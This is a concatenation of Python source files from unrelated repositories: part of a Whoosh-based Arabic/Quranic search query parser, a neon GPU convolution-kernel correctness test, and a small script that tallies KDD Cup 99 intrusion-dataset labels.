) def _Synonyms( self, node, fieldname ): return self.make_synonyms( fieldname, node[1] ) def _Antonyms( self, node, fieldname ): return self.make_antonyms( fieldname, node[1] ) def _Derivation( self, node, fieldname ): return self.make_derivation( fieldname, text = node[-1], level = len( node ) - 1 ) def _SpellErrors( self, node, fieldname ): return self.make_spellerrors( fieldname, node[1] ) def _Tashkil( self, node, fieldname ): if len( node ) > 2:lst = node[1:-1] else:lst = [] return self.make_tashkil( fieldname, lst ) def _Tuple( self, node, fieldname ): return self.make_tuple( fieldname, [node[i][0] for i in range( 1, len( node ), 2 )] ) def _Prefix( self, node, fieldname ): return self.make_prefix( fieldname, node[1] ) def make_synonyms( self, fieldname, text ): return self.Synonyms( fieldname, text ) def make_antonyms( self, fieldname, text ): return self.Antonyms( fieldname, text ) def make_derivation( self, fieldname, text, level ): return self.Derivation( fieldname, text, level ) def make_spellerrors( self, fieldname, text ): return self.SpellErrors( fieldname, text ) def make_tashkil( self, fieldname, words ): words = [word for word in words if word[0] not in " \t\r\n"] if len( words ):return self.Tashkil( fieldname, words ) else :return NullQuery def make_tuple( self, fieldname, items ): return self.Tuple( fieldname, items ) def make_wildcard( self, fieldname, text ): field = self._field( fieldname ) if fieldname else None if field: text = self.get_term_text( field, text, tokenize = False, removestops = False ) return self.Wildcard( fieldname, text ) def make_prefix( self, fieldname, text ): field = self._field( fieldname ) if field: text = self.get_term_text( field, text, tokenize = False, removestops = False ) return self.Prefix( fieldname, text ) class QMultiTerm( MultiTerm ): """ basic class """ def _words( self, ixreader ): fieldname = self.fieldname return [ word for word in self.words \ if ( fieldname, word ) in ixreader ] def __unicode__( self 
): return u"%s:<%s>" % ( self.fieldname, self.text ) def __repr__( self ): return "%s(%r, %r, boost=%r)" % ( self.__class__.__name__, self.fieldname, self.text, self.boost ) def _all_terms( self, termset, phrases = True ): for word in self.words: termset.add( ( self.fieldname, word ) ) def _existing_terms( self, ixreader, termset, reverse = False, phrases = True ): fieldname, words = self.fieldname, self.words fieldnum = ixreader.fieldname_to_num( fieldname ) for word in words: contains = ( fieldnum, word ) in ixreader if reverse: contains = not contains if contains: termset.add( ( fieldname, word ) ) class FuzzyAll( QMultiTerm ): """ do all possible operations to make a fuzzy search - Synonyms - root derivation - spell - tashkil """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.pipeline( self.fieldname, self.text ) def pipeline( self, fieldname, text ): words = set() words |= set( ArabicParser.Synonyms( fieldname, text ).words ) words |= set( ArabicParser.Derivation( fieldname, text ).words ) return list( words ) class Synonyms( QMultiTerm ): """ query that automatically searches for synonyms of the given word in the same field. """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.synonyms( self.text ) @staticmethod def synonyms( word ): """ TODO find an arabic synonyms thesaurus """ return [word] class Antonyms( QMultiTerm ): """ query that automatically searches for antonyms of the given word in the same field. """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.antonyms( self.text ) @staticmethod def antonyms( word ): """ TODO find an arabic antonyms thesaurus """ return [word] class Derivation( QMultiTerm ): """ query that automatically searches for derivations of the given word in the same field. 
""" def __init__( self, fieldname, text, level = 0, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.derivation( self.text, level ) @staticmethod def derivation( word, leveldist ): """ TODO find a good specific stemmer for arabic language, manipulate at least tow levels of stemming root,lemma """ return [word] class SpellErrors( QMultiTerm ): """ query that ignores the spell errors of arabic letters such as: - ta' marbuta and ha' - alef maqsura and ya' - hamza forms """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = [text] self.ASF = QArabicSymbolsFilter( shaping = True, tashkil = False, spellerrors = True, hamza = True ) def _words( self, ixreader ): for field, indexed_text in ixreader.all_terms(): if field == self.fieldname: if self._compare( self.text, indexed_text ): yield indexed_text def _compare( self, first, second ): """ normalize and compare """ if first[:2] == u"مو": print first eqiv = ( self.ASF.normalize_all( first ) == self.ASF.normalize_all( second ) ) if eqiv: self.words.append( second ) return eqiv class Tashkil( QMultiTerm ): """ query that automatically searches for different tashkil of words of the given word in the same field. 
""" def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost ASF = QArabicSymbolsFilter( shaping = False, tashkil = True, spellerrors = False, hamza = False ) self.words = [ASF.normalize_all( word ) for word in text] def _words( self, ixreader ): for field, indexed_text in ixreader.all_terms(): if field == self.fieldname: for word in self.text: if self._compare( word, indexed_text ): yield indexed_text def _compare( self, first, second ): """ normalize and compare """ word1 = unicode_( first ) word2 = unicode_( second ) eqiv = ( word1 == word2 ) if eqiv: self.words.append( second ) return eqiv class Tuple( QMultiTerm ): """ query that automatically searches for different words that have the same root*pattern*type of the given word in the same field. """ def __init__( self, fieldname, items, boost = 1.0 ): self.fieldname = fieldname self.props = self._properties( items ) self.text = "(" + ",".join( items ) + ")" self.boost = boost self.words = self.tuple( self.props ) def _properties( self, items ): """ convert list of properties to a dictionary """ l = len( items ) if l >= 0: D = {} if l >= 1: D["test"] = items[0] if l >= 2: pass # add new props return D @staticmethod def tuple( props ): """ search the words that have some specific properties TODO find an arabic analyzer that can suggest a word properties """ return [] class Wildcard( whoosh_Wildcard ): """customize the wildcards for arabic symbols """ def __init__( self, fieldname, text, boost = 1.0 ): new_text = text.replace( u"؟", u"?" 
) super( ArabicParser.Wildcard, self ).__init__( fieldname, new_text, boost ) class QuranicParser( ArabicParser ): """a customized query parser for Quran""" def __init__( self, schema, mainfield = "aya", otherfields = [], termclass = Term, ara2eng = ara2eng_names ): super( QuranicParser, self ).__init__( schema = schema, mainfield = mainfield, otherfields = otherfields, termclass = termclass ) class FuzzyAll( ArabicParser.FuzzyAll ): """ specific for quran """ def pipeline( self, fieldname, text ): words = set() words |= set( QuranicParser.Synonyms( fieldname, text ).words ) words |= set( QuranicParser.Derivation( fieldname, text, level = 1 ).words ) return list( words ) class Synonyms( ArabicParser.Synonyms ): """ query that automatically searches for synonyms of the given word in the same field.specific for qur'an """ @staticmethod def synonyms( word ): if syndict.has_key( word ): return syndict[word] else: return [word] if FEEDBACK: raise FeedBack( table = "synonyms", value = word ) class Antonyms( ArabicParser.Antonyms ): """ query that automatically searches for antonyms of the given word in the same field. 
""" @staticmethod def antonyms( word ): if antdict.has_key( word ): return antdict[word] else: return [word] if FEEDBACK: raise FeedBack( table = "antonyms", value = word ) class Derivation( ArabicParser.Derivation ): """ specific for quran """ @staticmethod def derivation( word, leveldist ): """ search in defined field """ # define source level index if word in derivedict["word_"]: indexsrc = "word_" elif word in derivedict["lemma"]: indexsrc = "lemma" elif word in derivedict["root"]: indexsrc = "root" else: indexsrc = None # warning # define destination level index if leveldist == 0: indexdist = "word_" elif leveldist == 1: indexdist = "lemma" elif leveldist == 2: indexdist = "root" else: indexdist = "root" # new levels lst = [] if indexsrc: # if index source level is defined itm = LOCATE( derivedict[indexsrc], derivedict[indexdist], word ) if itm: # if different of none lst = FILTER_DOUBLES( FIND( derivedict[indexdist], derivedict["word_"], itm ) ) else: lst = [word] return lst class Tuple( ArabicParser.Tuple ): """ query that automatically searches for different words that have the same root*pattern*type of the given word in the same field. 
""" def _properties( self, items ): """ convert list of prop"rties to a dictionary """ l = len( items ) if l >= 0: D = {} if l >= 1: D["root"] = items[0] if l >= 2: D["type"] = items[1] if l >= 3: D["pattern"] = items[2] if l >= 4: pass # new properties return D @staticmethod def tuple( props ): """ search the words that have the specific properties """ wset = set() firsttime = True for propkey in props.keys(): if worddict.has_key( propkey ): partial_wset = set( FIND( worddict[propkey], worddict["word_"], props[propkey] ) ) if firsttime: wset = partial_wset;firsttime = False else: wset &= partial_wset else: # property has now index pass return list( wset ) class Wildcard( ArabicParser.Wildcard, ArabicParser.QMultiTerm ): """ customize the wildcards for highlight """ def __init__( self, fieldname, text, boost = 1.0 ): self.words = [] new_text = text.replace( u"؟", u"?" ) super( QuranicParser.Wildcard, self ).__init__( fieldname, new_text, boost ) def _words( self, ixreader ): if self.prefix: candidates = ixreader.expand_prefix( self.fieldname, self.prefix ) else: candidates = ixreader.lexicon( self.fieldname ) exp = self.expression for text in candidates: if exp.match( text ): self.words.append( text ) yield text def normalize( self ): # If there are no wildcard characters in this "wildcard", # turn it into a simple Term. text = self.text if text == "*": return Every( boost = self.boost ) if "*" not in text and "?" not in text: # If no wildcard chars, convert to a normal term. return Term( self.fieldname, self.text, boost = self.boost ) elif ( "?" not in text and text.endswith( "*" ) and text.find( "*" ) == len( text ) - 1 and ( len( text ) < 2 or text[-2] != "\\" ) ): # If the only wildcard char is an asterisk at the end, convert to a # Prefix query. 
return QuranicParser.Prefix( self.fieldname, self.text[:-1], boost = self.boost ) else: return self class Prefix( whoosh_Prefix, ArabicParser.QMultiTerm ): """customize Prefix for highlight """ def __init__( self, fieldname, text, boost = 1.0 ): self.words = [] super( QuranicParser.Prefix, self ).__init__( fieldname, text, boost ) def _words( self, ixreader ): tt = ixreader.termtable fieldid = ixreader.schema.to_number( self.fieldname ) for fn, t in tt.keys_from( ( fieldid, self.text ) ): if fn != fieldid or not t.startswith( self.text ): return self.words.append( t ) yield t class SuperFuzzyAll( QuranicParser.FuzzyAll ): """ specific for quran search with all possible forms of the word """ def pipeline( self, fieldname, text ): words = set() words |= set( QuranicParser.Synonyms( fieldname, text ).words ) words |= set( QuranicParser.Derivation( fieldname, text, level = 1 ).words ) if len( words ) == 1: wildcarded_text = " ".join( map( lambda x: "*" + x + "*", text.split( " " ) ) ) words |= set( QuranicParser.Wildcard( fieldname, wildcarded_text ).words ) return list( words ) class FuzzyQuranicParser( QuranicParser ): """a customized query parser that respects Quranic properties""" def __init__( self, schema, mainfield = "aya", otherfields = [], termclass = SuperFuzzyAll, ara2eng = ara2eng_names ): super( FuzzyQuranicParser, self ).__init__( schema = schema, mainfield = mainfield, otherfields = otherfields, termclass = termclass ) self.fieldnames = [mainfield] + otherfields def _make( self, methodname, fieldname, *args ): method = getattr( super( FuzzyQuranicParser, self ), methodname ) if fieldname is None: return Or( [method( fn, *args ) for fn in self.fieldnames] ) else: return method( fieldname, *args ) def make_term( self, fieldname, text ): return self._make( "make_term", fieldname, text ) def make_range( self, fieldname, start, end, startexcl, endexcl ): return self._make( "make_range", fieldname, start, end, startexcl, endexcl ) def make_wildcard( self, 
fieldname, text ): return self._make( "make_wildcard", fieldname, text ) def make_phrase( self, fieldname, text ): return self._make( "make_phrase", fieldname, text )
agpl-3.0
matthijsvk/multimodalSR
code/Experiments/neon-master/neon/backends/conv_kernel_test.py
1
18713
#!/usr/bin/env python # Copyright 2016 Nervana Systems Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division from builtins import str import numpy as np import pycuda.driver as drv from neon import logger as neon_logger from neon.backends.nervanagpu import NervanaGPU from neon.backends.nervanacpu import NervanaCPU from neon.backends.convolution import (_ceil_div, FpropCuda, BpropCuda, UpdateCuda, FpropDirect, BpropDirect, UpdateDirect) from neon.backends.winograd_conv import ( FpropWinograd_2x2_3x3, BpropWinograd_2x2_3x3, UpdateWinograd_3x3_2x2, FpropWinograd_4x4_3x3, BpropWinograd_4x4_3x3, UpdateWinograd_3x3_4x4, FpropWinograd_2x2_5x5, BpropWinograd_2x2_5x5) fprop_kernels = (FpropCuda, FpropDirect, FpropWinograd_2x2_3x3, FpropWinograd_4x4_3x3, FpropWinograd_2x2_5x5) bprop_kernels = (BpropCuda, BpropDirect, BpropWinograd_2x2_3x3, BpropWinograd_4x4_3x3, BpropWinograd_2x2_5x5) update_kernels = (UpdateCuda, UpdateDirect, UpdateWinograd_3x3_2x2, UpdateWinograd_3x3_4x4) ng = NervanaGPU(0) nc = NervanaCPU() neon_logger.display(drv.Context.get_current().get_device().name()) out = 0 ones = 0 # D, H, W, T, R, S, pad, str conv_1x1 = ( 1, 14, 14, 1, 1, 1, 0,0,0, 1,1,1) conv_3x3 = ( 1, 14, 14, 1, 3, 3, 0,1,1, 1,1,1) conv_3x3p0 = ( 1, 14, 14, 1, 3, 3, 0,0,0, 1,1,1) conv_3x3p2 = ( 1, 14, 14, 1, 3, 3, 0,2,2, 1,1,1) conv_3x3s2 = ( 1, 14, 14, 1, 3, 3, 0,1,1, 1,2,2) conv_1x3 = ( 1, 14, 14, 1, 1, 3, 0,0,1, 1,1,1) conv_3x1 = ( 1, 14, 14, 1, 3, 1, 
0,1,0, 1,1,1) conv_5x5 = ( 1, 14, 14, 1, 5, 5, 0,2,2, 1,1,1) conv_11x11s4 = ( 1, 224, 224, 1,11,11, 0,2,2, 1,4,4) conv_1x1x1 = ( 7, 7, 7, 1, 1, 1, 0,0,0, 1,1,1) conv_3x3x3 = ( 7, 7, 7, 3, 3, 3, 1,1,1, 1,1,1) conv_3x3x3s2 = ( 7, 7, 7, 3, 3, 3, 1,1,1, 2,2,2) conv_3x3L = ( 1, 200, 200, 1, 3, 3, 0,1,1, 1,1,1) conv_1D = ( 1, 13, 3263, 1,13,11, 0,0,0, 1,1,3) # configs = [ # ] configs = [ # Kernel N, C, K Determ Cmpnd Xtern, conv (FpropCuda, 32, 32, 32, True, True, None, (conv_3x3,) ), (BpropCuda, 32, 32, 32, True, True, None, (conv_3x3,) ), (UpdateCuda, 32, 32, 32, True, True, None, (conv_3x3,) ), (FpropCuda, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5) ), (BpropCuda, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5) ), (UpdateCuda, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5) ), (FpropCuda, 32, 3, 64, True, False, None, (conv_11x11s4,) ), (UpdateCuda, 32, 3, 64, True, False, None, (conv_11x11s4,) ), (FpropDirect, 32, 32, 64, True, True, None, (conv_3x3,conv_3x3L) ), (BpropDirect, 32, 64, 32, True, True, None, (conv_3x3,conv_3x3L) ), (UpdateDirect, 32, 32, 32, True, True, None, (conv_3x3,conv_3x3L) ), (UpdateDirect, 32, 32, 32, False, True, None, (conv_3x3,conv_3x3L) ), (FpropDirect, 32, 32, 64, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 32, 64, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (UpdateDirect, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 32, 3, 64, True, False, None, (conv_11x11s4,) ), (UpdateDirect, 32, 3, 32, True, False, None, (conv_11x11s4,) ), (FpropDirect, 32, 64, 128, True, True, None, (conv_3x3,) ), (FpropDirect, 32, 32, 63, True, True, None, (conv_3x3,conv_3x3L) ), (FpropDirect, 32, 32, 1, True, 
True, None, (conv_3x3,conv_3x3L) ), (FpropDirect, 16, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 8, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 4, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 2, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 1, 32, 64, True, True, None, (conv_3x3,) ), (UpdateDirect, 16, 32, 63, True, False, None, (conv_3x3,) ), (UpdateDirect, 8, 32, 64, True, False, None, (conv_3x3,) ), (UpdateDirect, 4, 32, 128, True, False, None, (conv_3x3,) ), (FpropDirect, 32, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 16, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 8, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 4, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 2, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 1, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 32, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 16, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 8, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 4, 1, 512, True, False, None, (conv_1D,) ), # Kernel N, C, K Determ Cmpnd Xtern, conv (FpropDirect, 64, 32, 64, True, True, None, (conv_3x3,) ), (FpropDirect, 64, 32, 128, True, True, None, (conv_3x3,) ), (FpropDirect, 128, 32, 32, True, True, None, (conv_3x3,) ), (FpropDirect, 128, 32, 64, True, True, None, (conv_3x3,) ), (FpropDirect, 128, 32, 128, True, True, None, (conv_3x3,) ), (BpropDirect, 64, 64, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 64, 128, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 128, 32, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 128, 64, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 128, 128, 32, True, True, None, (conv_3x3,) ), (FpropDirect, 64, 32, 64, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 64, 32, 128, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, 
conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 128, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 128, 32, 64, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 128, 32, 128, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 64, 64, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 64, 128, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 128, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 128, 64, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 128, 128, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 64, 3, 64, True, False, None, (conv_11x11s4,) ), (FpropDirect, 64, 3, 128, True, False, None, (conv_11x11s4,) ), (FpropDirect, 128, 3, 32, True, False, None, (conv_11x11s4,) ), (FpropDirect, 128, 3, 64, True, False, None, (conv_11x11s4,) ), (FpropDirect, 64, 33, 56, True, True, None, (conv_3x3s2,) ), (FpropDirect, 64, 33, 120, True, True, None, (conv_3x3s2,) ), (FpropDirect, 128, 33, 56, True, True, None, (conv_3x3s2,) ), (FpropDirect, 128, 33, 120, True, True, None, (conv_3x3s2,) ), (FpropDirect, 128, 33, 248, True, True, None, (conv_3x3s2,) ), # Kernel N, C, K Determ Cmpnd Xtern, conv (FpropWinograd_2x2_3x3, 32, 32, 32, True, True, False, (conv_3x3,conv_3x3L) ), (FpropWinograd_2x2_3x3, 32, 32, 32, True, True, True, (conv_3x3,) ), (BpropWinograd_2x2_3x3, 32, 32, 32, True, True, False, (conv_3x3,conv_3x3L) ), 
(BpropWinograd_2x2_3x3, 32, 32, 32, True, True, True, (conv_3x3,) ), (UpdateWinograd_3x3_2x2, 32, 32, 32, True, True, None, (conv_3x3,) ), (UpdateWinograd_3x3_2x2, 32, 32, 32, False, True, None, (conv_3x3,) ), (FpropWinograd_4x4_3x3, 32, 32, 32, True, True, False, (conv_3x3,) ), (FpropWinograd_4x4_3x3, 32, 32, 32, True, True, True, (conv_3x3,conv_3x3L) ), (BpropWinograd_4x4_3x3, 32, 32, 32, True, True, False, (conv_3x3,) ), (BpropWinograd_4x4_3x3, 32, 32, 32, True, True, True, (conv_3x3,conv_3x3L) ), (UpdateWinograd_3x3_4x4, 32, 32, 32, True, True, None, (conv_3x3,) ), (UpdateWinograd_3x3_4x4, 32, 32, 32, False, True, None, (conv_3x3,) ), (FpropWinograd_2x2_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (BpropWinograd_2x2_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (UpdateWinograd_3x3_2x2, 32, 32, 32, True, False, None, (conv_3x3p0,conv_3x3p2) ), (FpropWinograd_4x4_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (BpropWinograd_4x4_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (UpdateWinograd_3x3_4x4, 32, 32, 32, True, False, None, (conv_3x3p0,conv_3x3p2) ), (FpropWinograd_2x2_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (BpropWinograd_2x2_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (UpdateWinograd_3x3_2x2, 1, 63, 63, True, False, None, (conv_3x3,) ), (FpropWinograd_4x4_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (BpropWinograd_4x4_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (UpdateWinograd_3x3_4x4, 1, 63, 63, True, False, None, (conv_3x3,) ), (FpropWinograd_2x2_5x5, 32, 32, 32, False, True, None, (conv_5x5,) ), (BpropWinograd_2x2_5x5, 32, 32, 32, False, True, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 32, 64, 192, False, False, None, (conv_5x5,) ), (BpropWinograd_2x2_5x5, 32, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 16, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 8, 64, 192, False, False, 
None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 4, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 2, 64, 192, False, False, None, (conv_5x5,) ), ] fprop_opts = [ dict(), dict(slope=0.0, relu=True), dict(slope=0.1, relu=True), dict(bias=True), dict(bias=True, slope=0.0, relu=True), dict(bias=True, slope=0.1, relu=True), dict(bsum=True), ] bprop_opts = [ dict(), dict(X=True, slope=0.0, brelu=True), dict(X=True, slope=0.1, brelu=True), dict(X=True, bsum=True, slope=0.0, brelu=True), dict(X=True, bsum=True, slope=0.1, brelu=True), dict(X=True, alpha=2.0, beta=3.0), dict(alpha=2.0, beta=3.0), ] update_opts = [ dict(alpha=2.0, beta=3.0), dict(), ] for config in configs: kernelClass, N, C, K, determ, compound, override, convs = config for conv in convs: D, H, W, T, R, S, pad_d, pad_h, pad_w, str_d, str_h, str_w = conv ng.deterministic = determ layer = nc.conv_layer(np.float64, N, C, K, D, H, W, T, R, S, pad_d, pad_h, pad_w, str_d, str_h, str_w) (M, P, Q) = layer.MPQ if kernelClass in (FpropCuda, BpropCuda, UpdateCuda): dtypes = (np.float32,) else: dtypes = (np.float32, np.float16) for dtype in (dtypes): ng.scratch_buffer_reset() if override is None: kernel = kernelClass(ng, np.dtype(dtype), N, C, K, D, H, W, T, R, S, M, P, Q, pad_d, pad_h, pad_w, str_d, str_h, str_w) else: kernel = kernelClass(ng, np.dtype(dtype), N, C, K, D, H, W, T, R, S, M, P, Q, pad_d, pad_h, pad_w, str_d, str_h, str_w, override) neon_logger.display(kernel) back = False if kernelClass in fprop_kernels: dimI1 = layer.dimI dimI2 = layer.dimF dimO = layer.dimO opts = fprop_opts func = layer.xprop_conv elif kernelClass in bprop_kernels: dimI1 = layer.dimO dimI2 = layer.dimF dimO = layer.dimI opts = bprop_opts func = layer.xprop_conv back = True elif kernelClass in update_kernels: dimI1 = layer.dimI dimI2 = layer.dimO dimO = layer.dimF opts = update_opts func = layer.update_conv else: raise TypeError("Unknown Kernel Class") if not compound: opts = [ dict() ] if ones: vals = 1.0 else: vals 
= (0.5 - ng.rand()) * 2 devI1 = ng.empty(dimI1, dtype=dtype) devI2 = ng.empty(dimI2, dtype=dtype) devO = ng.empty(dimO, dtype=dtype) devI1[:] = vals devI2[:] = vals devO[:] = vals cpuI1 = nc.array(devI1.get(), dtype=np.float64) cpuI2 = nc.array(devI2.get(), dtype=np.float64) cpuO = nc.array(devO.get(), dtype=np.float64) if compound and opts is not update_opts: devB = ng.empty((dimO[0], 1), dtype=np.float32) devS = ng.empty((dimO[0], 1), dtype=np.float32) devB[:] = vals devS[:] = vals cpuB = nc.array(devB.get(), dtype=np.float64) cpuS = nc.array(devS.get(), dtype=np.float64) if opts is bprop_opts: devX = ng.empty(dimO, dtype=dtype) devX[:] = vals cpuX = nc.array(devX.get(), dtype=np.float64) for opt in opts: dev_opts = dict(opt) cpu_opts = dict(opt) if back: cpu_opts["backward"] = True if "bias" in dev_opts: dev_opts["bias"] = devB cpu_opts["bias"] = cpuB if "bsum" in dev_opts: dev_opts["bsum"] = devS cpu_opts["bsum"] = cpuS if "X" in dev_opts: dev_opts["X"] = devX cpu_opts["X"] = cpuX kernel.bind_params(devI1, devI2, devO, **dev_opts) kernel.execute() func(cpuI1, cpuI2, cpuO, **cpu_opts) devA = devO.get() cpuA = cpuO._tensor difA = cpuA - devA if out: np.savetxt("out.txt", difA.reshape((-1,dimO[-1])), fmt='%6.3f') np.savetxt("outC.txt", cpuA.reshape((-1,dimO[-1])), fmt='%6.3f') np.savetxt("outD.txt", devA.reshape((-1,dimO[-1])), fmt='%6.3f') maxval = abs(cpuA).max() maxdif = abs(difA).max() ratio = maxdif / maxval if "bsum" in dev_opts: devZ = devS.get() cpuZ = cpuS._tensor difZ = abs(cpuZ - devZ) / abs(cpuZ).max() ratio2 = difZ.max() #print difZ # def output_slice(p, P, B): # p0 = p * B # p1 = p0 + B # if p1 > P: # p1 = P # return slice(p0, p1) # B = 4 # Yw = _ceil_div(P, B) # Xw = _ceil_div(Q, B) # bsum = np.empty((K, Yw, Xw)) # for y in range(Yw): # pSlice = output_slice(y, P, B) # for x in range(Xw): # qSlice = output_slice(x, Q, B) # for k in range(K): # bsum[k,y,x] = np.sum(cpuA[k,0,pSlice,qSlice,:]) # bsum = bsum.reshape((K,-1)) # np.savetxt("outC.txt", 
bsum, fmt='%6.1f') # np.savetxt("outD.txt", kernel.bsum.ary, fmt='%6.1f') # np.savetxt("out.txt", abs(bsum - kernel.bsum.ary), fmt='%6.1f') #print abs(devZ - np.sum(kernel.bsum.ary, axis=1, keepdims=True)) else: ratio2 = 0.0 bad = ratio > 0.01 or ratio2 > 0.01 if bad: neon_logger.display("=================FAIL==============") neon_logger.display("%17.12f %17.12f %s" % (ratio, ratio2, str(opt))) if bad: exit() devI1 = devI2 = devO = devB = devS = devX = None cpuI1 = cpuI2 = cpuO = cpuB = cpuS = cpuX = None
mit
starqiu/PythonLearn
dispdis2.py
1
1671
import csv csvfile1=file('simpl.csv','rb') fin1=csv.reader(csvfile1) label_dict={'back.':0,'buffer_overflow.':1,'ftp_write.':2,'guess_passwd.':3,'imap.':4,'ipsweep.':5,'land.':6,'loadmodule.':7, 'multihop.':8,'neptune.':9,'nmap.':10,'normal.':11,'perl.':12,'phf.':13,'pod.':14,'portsweep.':15,'rootkit.':16, 'satan.':17,'smurf.':18,'spy.':19,'teardrop.':20,'warezclient.':21,'warezmaster.':22} line1=input("please input num1:") line2=input("please input num2:") list1=[] list2=[] def read_spec_lines(line1,line2): csvfile=file('dispresult.csv','rb') fin=csv.reader(csvfile) global list1 global list2 for index,line in enumerate(fin): if index==line1: list1=line elif index==line2: list2=line break read_spec_lines(line1,line2) print "the list1 is:",list1 print print "the list2 is:",list2 print result2=[[],[],[],[],[],[],[],[],[],[]] for line in fin1: for i in range(len(line)): result2[i].append(line[i]) #print result2 #init temp row ,for store each row temp_row=[0 for i in range(23)] #print temp_row result3 = [] for row_index in range(9): for col_index,col in enumerate(result2[row_index]): #print "list1[row_index] ",list1[row_index] if list1[row_index] == col : label = result2[9][col_index] #print label label_index = label_dict[label] #print label_index #print temp_row[label_index] temp_row[label_index] += 1 #print temp_row[label_index] #print temp_row result3.append(temp_row) temp_row=[0 for i in range(23)] print result3
gpl-2.0
totalretribution/Cura
plugins/AutoSave/AutoSave.py
6
2018
